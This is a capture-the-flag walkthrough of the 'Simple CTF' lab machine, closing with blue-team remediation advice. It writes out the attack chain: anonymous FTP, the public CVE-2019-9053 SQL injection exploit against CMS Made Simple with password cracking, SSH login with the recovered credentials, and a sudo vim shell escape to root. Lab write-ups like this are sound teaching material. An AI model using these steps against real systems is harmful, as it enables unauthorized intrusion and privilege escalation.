Target: simplectf.thm (Requires /etc/hosts or IP)
Difficulty: Easy
Objective: User (mitch) & Root (root.txt)
1. Executive Summary
“Simple CTF” is a Linux machine that exposes a vulnerable Content Management System (CMS Made Simple) on the web port. Initial access is achieved by exploiting a known SQL Injection (CVE-2019-9053) vulnerability to recover credentials. After cracking the password, access is gained via SSH on a non-standard port (2222). Privilege escalation allows the user to run Vim as root via sudo, which is exploited to spawn a root shell.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap port scanning.
- T1190 (Exploit Public-Facing App): SQL Injection in CMS Made Simple.
- T1110 (Brute Force): Cracking MD5 password hashes.
- T1548.003 (Sudo and Sudo Caching): Exploiting
sudorights on thevimbinary.
2. Enumeration
A. Network Scanning
We start with a standard Nmap scan.
nmap -sC -sV -oN nmap/simple 10.10.x.xKey Findings:
- 21/tcp (FTP):
vsftpd 3.0.3(Anonymous Login Allowed). - 80/tcp (HTTP): Apache 2.4.18.
- 2222/tcp (SSH):
OpenSSH 7.2p2(Note: Non-standard port).
B. FTP Enumeration
Since Anonymous login is enabled:
ftp 10.10.x.x
# Name: anonymous, Pass: <empty>
ls
get ForMitch.txt- Intel: The file
ForMitch.txtmentions the usermitchand implies weak password policies.
C. Web Enumeration
- Directory Fuzzing:
gobusterorferoxbusterfinds a directory/simple. - CMS Identification: Browsing to
http://10.10.x.x/simpleshows the “CMS Made Simple” login page. - Version Detection: Scrolling to the footer of the page usually reveals the version.
- Version: 2.2.8.
3. Initial Access: The SQL Injection
A. Vulnerability Research
We check searchsploit for the CMS version.
searchsploit "CMS Made Simple"- Result:
CMS Made Simple < 2.2.10 - SQL Injection (CVE-2019-9053).
B. Exploitation (CVE-2019-9053)
This is a Time-Based SQL Injection that dumps the password hash and salt. We use the Python script (usually 46635.py) found in Exploit-DB.
Command:
python2 46635.py -u http://10.10.x.x/simple/ --crack -w /usr/share/wordlists/rockyou.txt(Note: Modern python scripts for this might require specific dependencies, but the logic remains the same).
Results:
- Salt:
1dac0d92e9fa6bb2 - Username:
mitch - Hash:
0c01f4468bd75d7a84c7eb73846e8d96 - Cracked Password:
secret
C. SSH Login
We use the cracked credentials to log in on the non-standard port.
ssh mitch@10.10.x.x -p 2222
# Password: secretUser Flag: user.txt in Mitch’s home directory.
4. Privilege Escalation: Sudo Vim
A. Enumeration
We check standard user privileges immediately.
sudo -lOutput:
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vimB. The Exploit (GTFOBins)
If we can run vim as root, we can spawn a shell from within it.
Command:
sudo vim -c ':!/bin/sh':!: Execute a shell command./bin/sh: The shell we want.
Result: We drop into a root shell.
# whoami
rootRoot Flag: /root/root.txt.
5. Remediation (Blue Team)
- Patch Management: Upgrade “CMS Made Simple” to the latest version to patch the SQL Injection vulnerability.
- Sudo Configuration:
- Avoid granting
NOPASSWDsudo rights to text editors likevim,nano, orless, as they allow trivial shell escapes. - If editing root files is required, use
sudoeditor grant access to a specific script that wraps the editor securely (though still risky).
- FTP Security: Disable Anonymous FTP access if it is not serving public data.
- SSH Security: While changing the port to 2222 reduces noise, it is “Security by Obscurity.” Enforce Key-Based Authentication.